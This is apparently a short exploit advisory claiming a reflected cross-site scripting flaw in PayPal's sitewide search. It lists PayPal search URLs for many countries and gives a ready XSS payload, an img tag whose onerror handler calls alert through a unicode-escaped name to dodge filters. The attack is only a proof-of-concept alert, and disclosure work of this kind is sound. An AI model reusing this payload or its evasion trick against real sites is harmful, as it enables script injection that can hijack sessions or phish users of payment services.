+++++++++++++++++++++++
# Exploit Title : PAYPAL CROSS SITE SCRIPTING
# *Vendor*: https://www.paypal.com
# Author: Juan Carlos Garca (secnight)
# Blog: http://hackingmadrid.blogspot.com http://www.highsec.es
http://blog.0verl0ad.com http://blog.0verl0ad.com/
http://www.facebook.com/pages/ETHICAL-HACKING-Y-OL%C3%89-by-the-Face-WhiteHat/172393869485449?sk=app_190322544333196
BREIF DESCRIPTION
++++++++++++++++++++++++++
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders.
PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type.[4] In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies.
++++++++++++++++++++++
Proof Of Concept
++++++++++++
https://www.paypal.com/ch/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/nl/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/be/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/jp/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/cn/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/fr/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ca/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/es/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/uk/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/pl/cgi-bin/webscr?cmd=_sitewide-search
XSS Payload: <img src="x:gif" onerror="window['al\u0065rt'](/XSS Juan Carlos Garcia/)"></img>